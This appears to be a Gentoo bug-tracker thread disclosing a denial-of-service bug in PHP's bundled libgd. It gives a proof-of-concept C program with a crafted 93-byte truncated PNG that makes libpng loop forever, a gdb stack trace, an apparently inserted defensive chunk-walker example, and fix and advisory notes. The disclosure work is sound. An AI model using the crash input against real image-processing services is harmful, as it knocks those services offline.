php includes a local libgd copy.

+++ This bug was initially created as a clone of Bug #179154 +++

The following test case using libgd 2.0.34 apparently leads to an infinite loop in the libpng decoder. The infinite loop seems to occur between the libpng code (png_read_data()) and the libgd callback (gdPngReadData()), which may not properly detect truncated input. libpng's png_read_info() function hence never returns, and the library consumes 100% CPU.

/* id: gdbad3.c, Xavier Roche, May. 2007 */
/* gcc gdbad3.c -o bad -lgd && ./bad */
#include <stdio.h>
#include <stdlib.h>
#include "gd.h"

/* declared here, defined after main() */
static const unsigned char pngdata[93];

int main(void)
{
  gdImagePtr im;
  /* hand libgd the 93-byte in-memory PNG; this call never returns with libgd 2.0.34 */
  if ((im = gdImageCreateFromPngPtr(93, (char *) &pngdata[0])) != NULL) {
    fprintf(stderr, "success!\n");
    gdImageDestroy(im);
  } else {
    fprintf(stderr, "failed!\n");
  }
  return 0;
}

/* PNG data */
static const unsigned char pngdata[93] = {137,80,78,71,13,10,26,10,0,0,
  0,13,73,72,68,82,0,0,0,120,0,0,0,131,8,6,0,0,0,70,49,223,8,0,0,0,6,98,
  75,71,68,0,255,0,255,0,255,160,189,167,147,0,0,0,9,112,72,89,115,0,0,92,
  70,0,0,92,70,1,20,148,67,65,0,0,0,9,118,112,65,103,0,0,0,120,0,0,0,131,
  0,226,13,249,45};

Typical stack:

(gdb) where
#0  gdPngReadData (png_ptr=0x501090, data=0x501570 "", length=5247120) at gd_png.c:83
#1  0x00002af9ef5ab192 in png_read_data (png_ptr=0x501090, data=0x501570 "", length=9) at pngrio.c:33
#2  0x00002af9ef5a1935 in png_crc_read (png_ptr=0x501090, buf=0x501570 "", length=9) at pngrutil.c:96
#3  0x00002af9ef5a1a17 in png_crc_finish (png_ptr=0x501090, skip=5248368) at pngrutil.c:116
#4  0x00002af9ef5a425a in png_handle_unknown (png_ptr=0x501090, info_ptr=0x505ae0, length=9) at pngrutil.c:2221
#5  0x00002af9ef5a9e0d in png_read_info (png_ptr=0x501090, info_ptr=0x505ae0) at pngread.c:530
#6  0x00002af9eeb2baf9 in gdImageCreateFromPngCtx (infile=0x501010) at gd_png.c:189
#7  0x00002af9eeb2b9b0 in gdImageCreateFromPngPtr (size=5247120, data=0x501570) at gd_png.c:111
#8  0x00000000004006df in main ()

(If you ‘up’ to png_read_info() and try ‘finish’, you’ll see that this function never returns due to endless calls to gdPngReadData().)
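The report's point is that gdPngReadData() cannot tell libpng when the input has run out. As an added example (not the report's code, and not libgd's or libpng's), here is a stand-alone chunk walker in C that bounds every read by the buffer size, run over the 93-byte stream from the test case above. It shows that the stream is byte-complete through its fourth chunk (an unknown chunk, consistent with the png_handle_unknown() frame in the stack) and then simply stops with no IEND, the condition a read callback must turn into an error instead of silently returning stale bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* Outcome of walking the chunk stream. */
enum png_walk_status { PNG_OK = 0, PNG_BAD_SIG, PNG_TRUNCATED, PNG_NO_IEND };

/* PNG stores chunk lengths as big-endian 32-bit integers. */
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Walk length/type/data/CRC chunks without ever reading past `size`: PNG_OK at IEND,
 * PNG_TRUNCATED if a chunk is cut off by the buffer end, PNG_NO_IEND if the buffer ends
 * cleanly between chunks but IEND never arrives. *nchunks (if non-NULL) receives the
 * number of complete chunks seen before stopping. */
enum png_walk_status png_walk_chunks(const unsigned char *buf, size_t size, int *nchunks)
{
    static const unsigned char sig[8] = {137, 80, 78, 71, 13, 10, 26, 10};
    size_t off = 8;
    int seen = 0;
    if (nchunks) *nchunks = 0;
    if (size < 8 || memcmp(buf, sig, 8) != 0) return PNG_BAD_SIG;
    while (off < size) {
        uint32_t len;
        if (size - off < 12) return PNG_TRUNCATED;        /* no room for length+type+CRC */
        len = be32(buf + off);
        if (len > size - off - 12) return PNG_TRUNCATED;  /* declared length overruns buffer */
        if (nchunks) *nchunks = ++seen;
        if (memcmp(buf + off + 4, "IEND", 4) == 0) return PNG_OK;
        off += 12 + (size_t)len;
    }
    return PNG_NO_IEND;
}

/* Number of complete chunks before the walker stops. */
int png_complete_chunks(const unsigned char *buf, size_t size)
{
    int n;
    png_walk_chunks(buf, size, &n);
    return n;
}

/* The 93-byte stream from the gdbad3.c test case above, copied verbatim. */
const unsigned char gdbad3_png[93] = {137,80,78,71,13,10,26,10,0,0,
    0,13,73,72,68,82,0,0,0,120,0,0,0,131,8,6,0,0,0,70,49,223,8,0,0,0,6,98,
    75,71,68,0,255,0,255,0,255,160,189,167,147,0,0,0,9,112,72,89,115,0,0,92,
    70,0,0,92,70,1,20,148,67,65,0,0,0,9,118,112,65,103,0,0,0,120,0,0,0,131,
    0,226,13,249,45};
```

The same bound belongs in a libpng read callback: compare the bytes actually copied with the length libpng asked for and call png_error() on a short read, so the decoder unwinds through libpng's error path instead of spinning.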
php please advise.
JFYI: This bug has been fixed in >=php-5.2.3 (see http://www.php.net/releases/5_2_3.php); this version of php is only available in the php overlay atm.
php, what's the status here?
Same as with http://bugs.gentoo.org/180556 -- will be fixed once >=php-5.2.3-r2 from the overlay gets merged into the tree.
afaict php-5.2.3-r3 seems stable on all security supported arches, so ready for glsa. maybe we could mention this issue as part of the GD draft. security, please comment.
GLSA 200710-02, sorry for the delay.